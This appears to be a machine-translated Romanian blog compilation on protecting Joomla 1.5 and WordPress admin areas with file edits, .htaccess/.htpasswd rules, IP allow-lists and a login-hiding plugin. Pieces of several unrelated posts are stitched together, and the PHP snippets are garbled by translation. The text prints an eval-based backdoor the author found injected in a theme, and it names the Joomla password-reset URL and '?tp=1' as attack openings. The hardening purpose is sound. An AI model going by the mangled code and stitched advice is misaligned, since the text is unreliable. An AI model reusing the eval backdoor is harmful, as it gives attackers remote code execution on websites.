Acasă Accesorii

Protejăm panoul de administrare Joomla de vizitatorii neautorizați. Protejarea și ascunderea panoului de administrare prin .htaccess Adăugarea unei parole într-un folder din CPanel

08.08.2024

Bună ziua, dragi cititori ai site-ului blogului. Astăzi vreau să vă vorbesc despre siguranța locului de muncă și despre câteva metode de protejare a unui site web de hacking. Din păcate, nu sunt un expert în acest domeniu și cunoștințele mele nu depășesc domeniul de aplicare al articolului despre, dar voi descrie pur și simplu experiența mea recentă. Nu am folosit nimic complicat, dar sper că va crește securitatea lucrului cu site-urile mele.

Este vorba despre autentificare dublă pentru a vă conecta la panoul de administrare al motorului site-ul dvs. (ar trebui să funcționeze pe orice CMS, dar personal l-am testat doar pe WordPress și Joomla). Protecția este instalată la nivel de server, astfel încât toate încercările de a ghici parola pentru panoul de administrare (forță brută) nu vor crea o încărcare crescută pe găzduire și este destul de dificil să o ocoliți. Este ușor de instalat (literal în câțiva pași) și din toate cunoștințele necesită doar atenție și capacitatea de a accesa site-ul prin FTP.

Ei bine, voi oferi și câteva acțiuni pe care le-am aplicat site-urilor pe motoare Joomla 1.5 deja învechite, pe care nu are sens să le transfer, dar care îmi distrug în mod constant serverul și folosesc serverul pentru a trimite spam. Am efectuat recent acțiunile descrise, așa că nu pot confirma că site-urile au încetat să mai fie infectate cu viruși, dar sper că da. In general am incercat putin crește rezistența la fisurare a Joomla 1.5.

Cum să protejați Joomla 1.5 de hacking și viruși

După cum am menționat mai sus, problema este că două dintre site-urile mele care rulează Joomla 1.5 sunt piratate în mod constant. Le putem considera abandonate, pentru că nu le adaug materiale noi, dar generează în mod regulat venituri (din postarea de articole din Miralinks și Webartex, precum și link-uri din Gogetlinks). În general, este păcat să le arunci și să le transferi într-o nouă versiune a motorului „pentru deșeuri” (păcat pentru timpul și efortul pierdut).

Tot ce rămâne este fie să monitorizezi în mod constant încărcarea de pe server și, atunci când aceasta crește, să cauți shell-uri și alte programe malware printre fișierele motorului, fie să întărești cumva protecția. Pentru a căuta malware, descarc fișierele motorului pe computer și le scanez cu DoctorWeb și Aibolit. Primul nu găsește totul, iar cel din urmă vede inamicul prea des acolo unde nu există, dar nu cunosc alte metode eficiente. Deși, există și zeci de programe, dar acest lucru este mai convenabil pentru toată lumea.

Apropo, scenariul Aibolit poate funcționa nu numai pe server, ci și direct pe computer în folderul cu fișierele motor descărcate (nu uitați să dezactivați antivirusul standard atunci când descărcați site-ul, deoarece poate șterge unele dintre fișiere, dar acestea vor încă rămâne pe server).

Instrucțiuni detaliate sunt oferite în videoclipul de mai jos, dar pe scurt, descărcați interpretul de limbaj PHP de pe site-ul Microsoft și îl instalați. După care deschideți fișierul script Aibolit numit ai-bolit.php folosind chiar acest interpret:

Viteza de scanare depinde de viteza computerului dvs. și de numărul de fișiere din motorul site-ului dvs. web. Mi-au luat câteva ore pentru https://site-ul, pentru că Aibolit suspectează chiar și poze cu viruși ascunși și am o tonă de aceste imagini, iar fișierele cache durează mult la scanare. Pentru site-urile de pe Joomla 1.5, verificarea a fost mult mai rapidă.

Am decis să petrec o zi căutând modalități de a îmbunătăți securitatea site-ului. Am reușit să facem foarte puțin, dar tot mai bine decât nimic. Să începem cu consolidarea protecției (și reducerea vulnerabilităților) a două site-uri pe Joomla 1.5. S-a făcut următoarele:


Cum să protejezi Joomla 1.5 de viruși și hack-uri de streaming

  1. De asemenea, „experții” susțin că site-urile de pe Joomla 1.5 sunt sparte „de o dată sau de două ori” prin utilizarea celui disponibil în motor (se presupune că puteți schimba parola de administrator prin intermediul acestuia). Chiar dacă nu utilizați înregistrarea pe site-ul dvs. și nu afișați nicăieri un link de recuperare, aceasta nu înseamnă că ați acoperit această vulnerabilitate. Doar adăugați următorul fragment la adresa URL a paginii de pornire a site-ului dvs. și obțineți funcția pe care o căutați: /index.php?option=com_user&view=reset

    De fapt, pentru a închide această lacună (dar încă nu înțeleg cum să o folosesc pentru hacking), puteți pur și simplu să ștergeți următorul fișier:

    /components/com_user/models/reset.php Adevărat, după aceasta, niciunul dintre utilizatorii înregistrați pe site-ul dvs. nu va putea folosi funcția de recuperare a parolei, dar pentru mine acest lucru nu a fost important, deoarece înregistrarea nu a fost furnizată.

  2. De asemenea, ei spun că un astfel de truc util, cum ar fi adăugarea la adresa paginii, permite, de asemenea, scriitorilor de viruși și vânătorilor de proprietatea altor persoane să ajungă în anumite zone sensibile ale site-ului dvs. și să îl facă distructiv sau, într-un alt mod, să îl abuzeze. Acest lucru este din nou eliminat prin editarea unuia dintre fișierele motor.

    /libraries/Joomla/application/module/helper.php

    Acolo trebuie să eliminați două bucăți de cod sau să le comentați, încadrându-le în /* și */ (acest cod nu va fi executat de interpretul de limbă). Primul fragment este cam așa:

    If(count($rezult) == 0) ( if(JRequest::getBool("tp"))) ( $result = JModuleHelper::getModule("mod_".$position); $result->title = $position; $rezultat->conținut = $poziție; $rezultat->poziție = $poziție;

    Iar al doilea este cam asa:

    If(JRequest::getBool("tp")) ($atribs["stil"] .= "contur"; )

    De fapt, după aceasta resetați memoria cache și încercați să vizualizați pozițiile modulelor din șablonul dvs. folosind această construcție:

    Https://site/?tp=1

  3. Dacă nu a funcționat, atunci sper că ai închis această gaură. Foarte des site-urile sunt sparte nu din exterior, ci din interior. Troienii și keygen-urile de pe computer știu ce și unde să caute, așa că nu stocați parolele în clienții FTP
  4. (există o opțiune de utilizat în acest scop) Se consideră și mai cool să dezactivați posibilitatea de a accesa site-ul dvs. prin FTP și, în schimb, în ​​cazul în care informațiile transmise (inclusiv parolele) sunt criptate, ceea ce face ca interceptarea acestora să fie inutilă. Sincer să fiu, neglijez ultimul sfat din cauza „întunericului”. Există, de asemenea, opțiunea de a configura accesul la site-ul dvs. prin FTP obișnuit numai de la o anumită adresă IP (calculatorul dvs.), dar furnizorul meu de internet are un IP dinamic (se modifică într-un anumit interval). De asemenea, sfătuiește motor

    Am setat permisiunile la 444 pentru fișierele din folderul rădăcină și la 705 pentru directoarele tmp și jurnalele. a pierde timpul cu experimente. Și în plus, toate acestea nu vor descuraja serios hackerii, pentru că există lucruri care ne pot anula toate eforturile. Pentru a face acest lucru, utilizați comenzi ca aceasta:

    Prin urmare, pentru a „concreta” complet fișierele motorului Joomla 1.5 de la hacking și ucidere, este necesar să interziceți modificarea drepturilor de acces la fișiere și foldere prin PHP. Acest lucru se face în setările serverului, dar încă nu știu cum și unde. Dacă știți, vă rugăm să postați un link.

  5. Toate cele de mai sus sunt concepute pentru a reduce probabilitatea ca site-ul dvs. să fie piratat și pătruns de shell-uri și alte programe malware. Cu toate acestea, precauțiile luate nu sunt o garanție, așa că ar fi grozav pe server (unde locuiește site-ul tău Joomla 1.5). Acest lucru va elimina toată negativitatea din răul scurs. Cu toate acestea, personal, din nou, nu am implementat încă acest lucru din motive de „întuneric”. Aș fi recunoscător pentru link-urile către materiale care explică acest proces.

    6. Foarte des, site-urile web sunt sparte după ce au acces la panoul administrativ. Este clar că este protejat prin parolă, așa că folosind forța brută (ghicire inteligentă) multe parole chiar și aparent complexe sunt sparte în una sau două secunde. De aceea panoul de administrare trebuie de asemenea protejatși este mai bine să faceți acest lucru nu folosind extensii suplimentare, ci folosind instrumente de server. Există mai multe opțiuni de protecție. De exemplu, puteți schimba adresa URL a panoului de administrare într-un fel sau altul, astfel încât un hacker să nu poată începe afacerea murdară.

    O altă metodă de protecție, care va fi descrisă în detaliu mai jos, este crearea unei bariere suplimentare în calea unui atacator (o persoană în viață sau un script). Constă în protejarea cu parolă a directorului cu fișiere admin (în Joomla acesta este folderul administrator, iar în WordPress - wp-admin) folosind serverul web. Se pare că atunci când accesați panoul de administrare, va trebui mai întâi să introduceți login-ul și parola pentru a accesa folderul, iar abia apoi login-ul și parola pentru a accesa, de fapt, panoul de administrare al motorului. Mai mult, prin spargerea primei linii de apărare folosind metode de forță brută, malware-ul nu va crea nicio încărcare suplimentară semnificativă pe server, ceea ce este bine.

  6. O altă notă foarte importantă, în opinia mea, pentru creșterea securității site-urilor dvs. împotriva hackingului și a infecției cu virusi este să urmați regula: un site - un cont de gazduire. Da, este mai scump, dar mult mai sigur. Atunci când sunt găzduite pe un singur cont, toate site-urile dvs. vor fi imediat accesibile prin FTP dacă malware-ul obține acces doar la unul dintre ele. Ele sparg site-urile automat și nu ar fi rezonabil să sperăm că scripturile nu vor urca în arborele de directoare. În plus, este foarte greu să tratezi o grămadă de site-uri pe un singur cont de găzduire, deoarece lucrând pe un site îl pierzi din vedere pe cel deja vindecat, care se infectează în același timp.
  7. Apropo, se pot rupe nu numai de pe site-ul tău, ci și de pe site-ul vecinului tău de găzduire, dacă proprietarii nu au avut grijă să excludă această posibilitate. Panoul de găzduire (cum ar fi) poate fi, de asemenea, piratat, dar, în orice caz, numărul de hack-uri din vina hosterului este neglijabil în comparație cu numărul de hack-uri din cauza neglijenței proprietarilor site-ului.

Cum să protejați zona de administrare a site-ului dvs. de hacking?

Vreau să vorbesc în detaliu despre metoda de protecție pe care am folosit-o recent. Constă în interzicerea accesului la folderele în care se află fișierele panoului administrativ al site-ului. Interdicția este setată folosind un fișier minunat .htaccess, care, în esență, vă permite să controlați de la distanță setările serverului web pe care este instalat site-ul dvs. În același timp, știe să facă acest lucru selectiv.

Toate directivele scrise în .htaccess se vor aplica numai directorului în care se află. Doriți să schimbați ceva în setările pentru întregul site? Apoi plasați .htaccess în folderul rădăcină. Ei bine, ne interesează doar setările referitoare la folderul cu fișierele admin, așa că îl vom plasa acolo. În Joomla acesta va fi folderul administrator, în WordPress - wp-admin.

Cu toate acestea, nu ne putem descurca singuri cu .htaccess. De asemenea, va trebui să utilizați .htpasswd, unde vor fi stocate login-ul și parola pentru accesarea acestui folder administrativ. Mai mult, parola nu va fi stocată în text clar, ci ca un cifru MD5. Nu va fi posibil să recuperați parola utilizând-o, dar când introduceți combinația corectă în câmpul de parolă, serverul web va calcula suma MD5 pentru această combinație și o va compara cu ceea ce este stocat în .htpasswd. Dacă datele se potrivesc, atunci vi se va permite accesul în zona de administrare Joomla sau WordPress, dar dacă nu, atunci nu vi se va permite.

Atâta tot, tot ce rămâne este să aducă planul la viață. Trebuie să adăugați câteva directive la .htaccess. Stii care dintre ele? Nu știu. Și cumva va trebui să convertiți parola într-o secvență MD5. Problemă. Cu toate acestea, are o soluție destul de simplă. Oameni buni au organizat un serviciu online pentru generarea de conținut pentru fișierul .htaccess și fișierul .htpasswd pe baza numelui de utilizator și a parolei pe care le-ați creat. Adevărat, va trebui să specificați și calea absolută către folderul administrativ, dar acest lucru este banal.

Deci, faceți cunoștință cu cei mari și teribil generator de protecție pentru panoul de administrare al site-ului dvs. Văd, nu? Vii cu, sau cel mai bine, creezi două combinații complexe de litere, numere și simboluri pe ceva, după care le introduci în cele două câmpuri de sus. Nu uitați să le scrieți sau să le puneți într-un manager de parole, altfel nu vă veți putea conecta în zona de administrare și va trebui să începeți să faceți tot ce este descris în această parte din nou.

Aici, acum. Îl cunoști pe acesta? Chiar dacă nu știi, nu contează. Conectați-vă la site prin FTP, creați un fișier în rădăcină cu orice nume (chiar și cu următorul url_path.php) și adăugați acest cod simplu:

"; echo "Calea completă către script și numele acestuia: ".$_SERVER["SCRIPT_FILENAME"]."
"; echo "Nume script: ".$_SERVER["SCRIPT_NAME"]; ?>

Apoi accesați browser și introduceți această adresă URL în bara de adrese (cu domeniul dvs., desigur):

Https://site/url_path.php

Drept urmare, veți vedea calea absolută de care erați interesat. Introduceți-l în generatorul de fișiere .htaccess și .htpasswd de mai sus. Nu uitați să adăugați numele administratorului sau al folderului wp-admin la sfârșitul acestei căi fără bara oblică finală. Asta este, acum faceți clic pe butonul „Generează”.

Și unul câte unul, transferați conținutul fișierelor .htaccess și .htpasswd direct în aceleași fișiere.

Sper că le-ați creat deja în folderele administrator sau wp-admin (în funcție de motorul pe care îl utilizați)?

Ei bine, acum încercați să vă conectați la panoul de administrare. Apare o fereastră care vă cere să introduceți numele de utilizator și parola serverului dvs. web? Este redat diferit în diferite browsere, dar în Chrome arată astfel:

Dacă ceva nu funcționează, atunci „fumați” calea absolută către .htpasswd, scrisă în fișierul .htaccess. În acest caz, corectați-l manual atunci când editați fișierul. Atât am vrut să vă spun astăzi. Dacă vrei să critici sau să adaugi ceva, atunci mergi mai departe.

Virus în WordPress?

După ce am scris acest articol, am descoperit malware pe blogul meu (https://site) (sau ceva care a fost instalat ocolind voința mea). Am vrut doar să schimb ceva în cod și am intrat în . În partea de jos, imediat înainte de eticheta Body, am fost lovit de un apel la o funcție necunoscută pentru mine (pe baza numelui ei, dar nu am găsit nimic util):

Numele pare să fie sănătos. Este de remarcat faptul că, cu aproximativ trei săptămâni înainte, am descoperit din greșeală că aveam un tabel nou în bazele de date a două dintre blogurile mele WordPress (https://site și încă unul). Numele său era pur și simplu minunat - wp-config. Googlarea acestui nume din nou nu a dat nimic util, deoarece toate răspunsurile erau legate de fișierul wp-config.php cu același nume.

Acest tabel a crescut rapid în dimensiune (până la o sută de megaocteți pe https://site) și au fost scrise în el adresele paginilor site-ului meu cu diverși parametri. Neînțelegând esența acestui proces, pur și simplu am demolat această masă și gata. Apropo, mai am un blog pe WordPress, dar acolo nu s-a observat nimic de genul acesta.

Ei bine, aici am găsit o astfel de inserție „vorbitoare” în subiect. Am decis să văd dacă ceva în concordanță cu linia descrisă mai sus în partea de jos a subsolului fusese adăugat acolo. S-a dovedit că a fost adăugat. Și atât de bine - nici în partea de sus, nici în partea de jos, ci a doua (sau a treia) funcție înscrisă de sus:

Funcția wp_custom_page_links_return() ( $option = get_option("wp_custom_page_links"); @eval($option); ) @eval(get_option("wp_brlinks"));

Aici îți atrage atenția minunatul „eval”. Ceea ce este de remarcat este că Aibolit (descris mai sus) a găsit acest fragment suspect, dar încă nu am ajuns la el, deoarece acest scenariu suspectează deja mulți oameni de nesiguranță. Am căutat și pe Google despre acest cod și am găsit o postare (din păcate, acel domeniu era acum blocat pentru neplată) care descrie o problemă similară. Un prieten de-al meu a scurs această porcărie cu o temă nouă în care a fost încorporat un cod de instalare.

Am avut subiecte pe ambele bloguri infectate de mulți ani. Trebuie să fi existat un fel de vulnerabilitate în motor sau , care a fost rapid (pe flux) exploatată de cei nedoritori. În general, verificați-vă pentru absența unor astfel de incluziuni. Data modificării dosarelor descrise a fost, după părerea mea, la jumătatea lunii septembrie a acestui an.

De asemenea, vă sfătuiesc să vă uitați la o selecție din 17 lecții video despre securizarea site-urilor web pe Joomla. Acestea vor fi redate automat unul după altul și, dacă doriți, puteți trece la următoarea lecție folosind butonul corespunzător de pe panoul playerului sau selectați lecția dorită din meniul drop-down din colțul din stânga sus al ferestrei playerului:

Vizionare placuta!

Mult succes pentru tine! Ne vedem curând pe paginile site-ului blogului

S-ar putea să fiți interesat

Site-ul Joomla a început să producă o grămadă de erori precum - Standarde stricte: Metoda non-statică JLoader::import () nu ar trebui să fie numită static în
Actualizarea Joomla la cea mai recentă versiune
Crearea unei hărți pentru un site Joomla folosind componenta Xmap
Ce este Joomla
Grupuri de utilizatori în Joomla, setări de cache și problema trimiterii e-mailurilor de pe site
Componenta K2 pentru crearea de bloguri, cataloage și portaluri pe Joomla - caracteristici, instalare și rusificare
Module în Joomla - poziția de vizualizare, setare și ieșire, precum și atribuirea sufixelor de clasă
Cum să actualizați un site HTML static la unul dinamic pe Joomla
Instalarea WordPress în detalii și imagini, autentificarea în zona de administrare WP și schimbarea parolei
Pluginuri Joomla - TinyMCE, Load Module, Legacy și altele instalate implicit

Dragi clienti! Un atac de forță brută este în desfășurare de mai bine de 3 zile pentru a obține date din părțile administrative ale CMS Wordpress și Joomla. În prezent, sistemul nostru de securitate blochează toate încercările de autentificare în părțile administrative ale CMS menționate mai sus.

Pentru a preveni piratarea site-urilor dvs. și, de asemenea, pentru a nu fi trecute pe lista neagră de sistemul nostru de securitate, vă recomandăm insistent să protejați părțile administrative ale CMS-ului dvs. de hacking, și anume, ascunderea intrării la acestea. Puteți găsi exemple de metode de protecție aici: Wordpress - http://forum.searchengines.ru/showpost.php?p=12014848&postcount=181 Joomla -http://e-kzn.ru/joomla/dostup-i-bezopasnost/ zashchita -adminki-joomla.html .

Ei bine, am citit și am citit. Cu toate acestea, când am ajuns la muncă, am încercat să mă autent în panoul de administrare al unuia dintre site-urile mele care rulează Joomla. Spre marea mea surpriză am văzut următorul mesaj.

Desigur, fără să introduc nicio parolă, crezând că am fost piratat, m-am grăbit să scriu suportului tehnic al găzduirii mele despre problema mea. Ca întotdeauna, mi-au răspuns în 10 minute.

Înțelegi că am fost în stare de șoc. Sunt șocat de cât de mult le pasă de clienții lor. Prin urmare, pe baza experienței mele, vă ofer metodele mele simple protejarea panoului de administrare de hacking.

Este foarte simplu. Acest lucru funcționează atât pe Joomla 1.5, cât și pe Joomla 2.5. Creați un fișier într-un fișier editor de text Windows cu numele .htaccess. Da, așa e. Punct, apoi htaccess și introduceți următoarele linii:

nega de la toti

permite de la 000.000.00.00

Unde 000.000.00.00 ip-ul computerului nostru. Plasați acest fișier în rădăcina folderului administrator. Acest lucru vă va permite să vă conectați în partea administrativă a site-ului numai de la o anumită adresă IP. Înțeleg că aproape toate IP-urile sunt dinamice, adică se schimbă atunci când computerul este repornit. Ei bine, aici rămâne la latitudinea dvs. să decideți ce este mai important - conectați-vă prin FTP de fiecare dată și schimbați numărul IP din fișier. htaccess foldere de administrator sau sacrifica securitatea site-ului.

În plus, producem măsuri de securitate suplimentare pentru a proteja panoul de administrare Joomlași site-ul în sine. Anume.

Am scris odată o postare despre cum. Metoda este, desigur, grozavă dacă IP-ul tău este static și lucrezi pe site într-un singur loc (să zicem, doar acasă sau doar la birou).

Personal, nu numai că mă mut des, dar, pe lângă orice altceva, pot face magie pe un site web din McDuck sau poate fi nevoie să mă conectez în zona de administrare când sunt pe stradă sau călătoresc. Pe scurt, metoda de blocare IP nu mi se potrivește.

Dar ce să faci atunci? La urma urmei, vreau să protejez cumva panoul de administrare. Atât de mult încât întregul director /wp-admin este inaccesibil celor din afară.

Mi se pare o opțiune bună de a adăuga autorizație suplimentară site-ului folosind combinația .htaccess + .htpasswd.

Ceea ce este și mai convenabil, puteți aplica această blocare nu numai panoului de administrare, ci și întregului site, de exemplu, dacă site-ul dvs. este în faza de testare și nu doriți să îl arătați nimănui înainte. Iată cum va arăta (pentru Google Chrome, diferit în diferite browsere):

Întregul proces va consta în două etape. Să începem.

.htaccess

În primul rând, creăm un fișier .htaccess în directorul site-ului pe care dorim să îl protejăm cu o parolă. Din moment ce vorbeam despre administratorul WordPress, creăm un fișier în folderul /wp-admin.

AuthName Nume autorizare. Mesajul va fi afișat în fereastra de autentificare și introducere a parolei. În plus, pentru a reseta parolele salvate în browsere, puteți pur și simplu să schimbați acest mesaj.

AuthUserFile Calea absolută de pe server către fișierul cu date de conectare și parole (doar .htpasswd). Pentru a-l găsi, utilizați funcția PHP getcwd() (Obțineți directorul de lucru curent).

.htpasswd

Un fișier cu utilizatori și parole de forma utilizator:parolă. Parola trebuie furnizată în formă criptată. Criptăm.

admin:$apr1$gidPSkjR$qvsL5fMNunK2T17DKSxtR/

Probabil știi deja cum să intri în zona de administrare WordPress?

  1. /admin, adică astfel: http://site-ul dvs./admin
  2. /wp-admin
  3. /log in
  4. /wp-login.php

În general, toate primele trei opțiuni de redirecționare vă vor conduce în continuare către pagina: http://your_site/wp-login.php

Se pare că oricine poate adăuga oricare dintre cele patru prefixe descrise mai sus la adresa site-ului dvs. și va vedea autentificarea administratorului:

Desigur, asta nu înseamnă deloc că oricine poate intra cu ușurință în panoul de administrare, pentru că trebuie să cunoască și numele de utilizator sau e-mailul și parola.

Dacă utilizatorul dvs. administrator are un login: – atunci acest lucru nu este deloc prudent din partea dvs. și atacatorul va trebui doar să vă ghicească sau să ghicească parola.

În plus, ați văzut inscripția: Nume de utilizator sau e-mail? Da, da, WordPress poate folosi e-mailul ca nume de utilizator. Dar ați putea indica o adresă de e-mail undeva pe site care se potrivește cu e-mailul utilizatorului administrator. Se pare că primul lucru pe care îl poate încerca un atacator este să vă introducă E-mail-ul și apoi WordPress îl va ajuta din nou, pentru că dacă E-mail-ul nu este potrivit, va vedea acest mesaj:

iar dacă e-mailul este corect, WordPress va scrie că parola pentru acesta este incorectă:

Ca urmare, avem o situație în care un potențial atacator, pentru a vă sparge site-ul (acces la panoul de administrare), va trebui doar să vă ghicească sau să ghicească parola.

Cum să protejați autentificarea administratorului de o potențială amenințare? Răspunsul este simplu - încercați să creșteți numărul de necunoscute necesare pentru a intra.

Acum să aruncăm o privire mai atentă:

  1. Dacă este posibil, asigurați-vă că e-mailul utilizatorului administrator nu este menționat nicăieri pe site - e-mailul public ar trebui să fie altceva.
  2. Parola dvs. nu ar trebui să fie simplă, atunci când instalați WordPress în sine generează o parolă complexă pentru dvs., dacă nu doriți să o utilizați, veniți cu o parolă mai mult sau mai puțin complexă, inclusiv caractere mici și mari, numere și unele simboluri precum -, ?, _ etc.
  3. Nici numele dvs. de utilizator nu ar trebui să fie simplu: admin, manager, root, administrator, user si alte cuvinte simple!
  4. Și, în sfârșit, trebuie să introduceți a treia cea mai importantă necunoscută - schimbați adresa URL de conectare a administratorului, pentru a face acest lucru, instalați un plugin simplu: WPS Ascundeți autentificare
WPS Ascunde autentificarea

Un plugin simplu, gratuit și destul de popular, care vă permite să schimbați adresa URL de conectare a administratorului.

După instalarea și activarea pluginului, trebuie să mergeți la secțiunea de administrare: Setări / General, apoi derulați până în partea de jos a paginii și vedeți doar un parametru adăugat de acest plugin:

În mod implicit, pluginul sugerează utilizarea login-ului http://yoursite/login - dar aceasta nu este în niciun caz cea mai bună opțiune! Vino cu ceva al tău, de exemplu: aaa12_go)))

După modificarea acestui parametru, nu uitați să faceți clic pe butonul Salvați modificările– în caz contrar, cu pluginul activ, veți avea un login prin http://yoursite/login

Asigurați-vă că încercați să vă deconectați și să vă conectați din nou în zona de administrare, dar folosind o nouă adresă de conectare pe care ați creat-o și, cel mai important, nu o uitați!

După schimbarea punctului de intrare al administratorului, atunci când încearcă să acceseze adrese URL standard, utilizatorul va primi o pagină de eroare 404.

Atenţie! Dacă uitați brusc noua adresă de conectare a administratorului, va trebui să dezactivați acest plugin. Acest lucru se poate face fără a accesa panoul de administrare dacă aveți acces la folderele și fișierele site-ului. Trebuie doar să redenumiți sau să ștergeți folderul plugin wps-hide-login, care va fi în folder pluginuri(dosarul de pluginuri se află în folderul wp-content).

Ca rezultat: după aplicarea tuturor măsurilor de mai sus, ar trebui să primim protecție de autentificare admin cu trei necunoscute: e-mail / nume de utilizator, o parolă complexă și propria noastră adresă URL de conectare unică - iar acest lucru poate complica semnificativ eforturile tinerilor hackeri)